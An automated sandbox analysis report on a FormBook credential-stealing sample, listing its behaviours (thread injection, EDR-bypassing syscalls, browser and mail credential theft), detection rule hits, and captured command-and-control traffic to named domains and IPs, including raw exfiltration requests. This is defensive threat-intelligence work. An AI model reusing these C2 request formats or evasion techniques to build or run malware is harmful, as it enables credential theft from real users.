Edit tour

Windows Analysis Report
aBEh0fsi2c.exe

Overview

General Information

Sample name:	aBEh0fsi2c.exe renamed because original name is a hash value
Original sample name:	9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06.exe
Analysis ID:	1588004
MD5:	ae1fe8e567226c914dc9a747e25d2118
SHA1:	70db43d604ed9a6da5afb4982d2f0cca238632bd
SHA256:	9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

aBEh0fsi2c.exe (PID: 8096 cmdline: "C:\Users\user\Desktop\aBEh0fsi2c.exe" MD5: AE1FE8E567226C914DC9A747E25D2118)

svchost.exe (PID: 7216 cmdline: "C:\Users\user\Desktop\aBEh0fsi2c.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

XWDsAjkFcK.exe (PID: 6920 cmdline: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

winver.exe (PID: 6036 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)

XWDsAjkFcK.exe (PID: 6544 cmdline: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , CommandLine: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, NewProcessName: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, OriginalFileName: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 6036, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , ProcessId: 6544, ProcessName: XWDsAjkFcK.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ParentImage: C:\Users\user\Desktop\aBEh0fsi2c.exe, ParentProcessId: 8096, ParentProcessName: aBEh0fsi2c.exe, ProcessCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ProcessId: 7216, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ParentImage: C:\Users\user\Desktop\aBEh0fsi2c.exe, ParentProcessId: 8096, ParentProcessName: aBEh0fsi2c.exe, ProcessCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ProcessId: 7216, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:27:05.356151+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49974	154.90.58.209	80	TCP
2025-01-10T20:27:30.033407+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49979	47.76.213.197	80	TCP
2025-01-10T20:27:43.729058+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49983	74.48.143.82	80	TCP
2025-01-10T20:27:56.899908+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49987	13.248.169.48	80	TCP
2025-01-10T20:28:11.290150+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49991	103.21.221.87	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:27:22.934808+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49976	47.76.213.197	80	TCP
2025-01-10T20:27:24.879333+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49977	47.76.213.197	80	TCP
2025-01-10T20:27:27.631097+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49978	47.76.213.197	80	TCP
2025-01-10T20:27:36.087507+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49980	74.48.143.82	80	TCP
2025-01-10T20:27:38.639796+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49981	74.48.143.82	80	TCP
2025-01-10T20:27:41.215893+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49982	74.48.143.82	80	TCP
2025-01-10T20:27:50.294439+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49984	13.248.169.48	80	TCP
2025-01-10T20:27:51.777235+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49985	13.248.169.48	80	TCP
2025-01-10T20:27:54.325725+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49986	13.248.169.48	80	TCP
2025-01-10T20:28:03.102177+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49988	103.21.221.87	80	TCP
2025-01-10T20:28:05.835980+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49989	103.21.221.87	80	TCP
2025-01-10T20:28:08.393691+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49990	103.21.221.87	80	TCP
2025-01-10T20:28:19.527236+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49992	8.218.14.120	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: aBEh0fsi2c.exe	Virustotal: Detection: 31%			Perma Link
Source: aBEh0fsi2c.exe	ReversingLabs: Detection: 76%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: aBEh0fsi2c.exe

Joe Sandbox ML: detected

Source: aBEh0fsi2c.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: winver.pdb source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWDsAjkFcK.exe, 00000004.00000002.2548851563.00000000008DE000.00000002.00000001.01000000.00000006.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1743900413.00000000008DE000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: wntdll.pdbUGP source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003C445A
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CC6D1 FindFirstFileW,FindClose,	0_2_003CC6D1
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_003CC75C
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003CEF95
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003CF0F2
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003CF3F3
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003C37EF
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003C3B12
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003CBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49974 -> 154.90.58.209:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 47.76.213.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 103.21.221.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49991 -> 103.21.221.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 103.21.221.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 74.48.143.82:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 74.48.143.82:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49987 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 74.48.143.82:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 47.76.213.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 47.76.213.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 8.218.14.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 47.76.213.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 103.21.221.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49983 -> 74.48.143.82:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.fortevision.xyz
Source:	DNS query: www.rtpterbaruwaktu3.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 103.21.221.87 103.21.221.87

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
Source: Joe Sandbox View	ASN Name: CNSERVERSUS CNSERVERSUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_003D22EE

Source: global traffic	HTTP traffic detected: GET /z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg== HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.grandesofertas.fun
Source: global traffic	DNS traffic detected: DNS query: www.jijievo.site
Source: global traffic	DNS traffic detected: DNS query: www.ytsd88.top
Source: global traffic	DNS traffic detected: DNS query: www.bpgroup.site
Source: global traffic	DNS traffic detected: DNS query: www.fortevision.xyz
Source: global traffic	DNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
Source: global traffic	DNS traffic detected: DNS query: www.prhmcjdz.tokyo

Source: unknown

HTTP traffic detected: POST /8qt7/ HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.ytsd88.topReferer: http://www.ytsd88.top/8qt7/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 196User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 4f 43 65 42 58 2f 51 4b 62 33 66 79 70 48 4d 4b 43 75 50 53 2f 56 59 37 55 34 72 Data Ascii: KzB47nV=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffOCeBX/QKb3fypHMKCuPS/VY7U4r

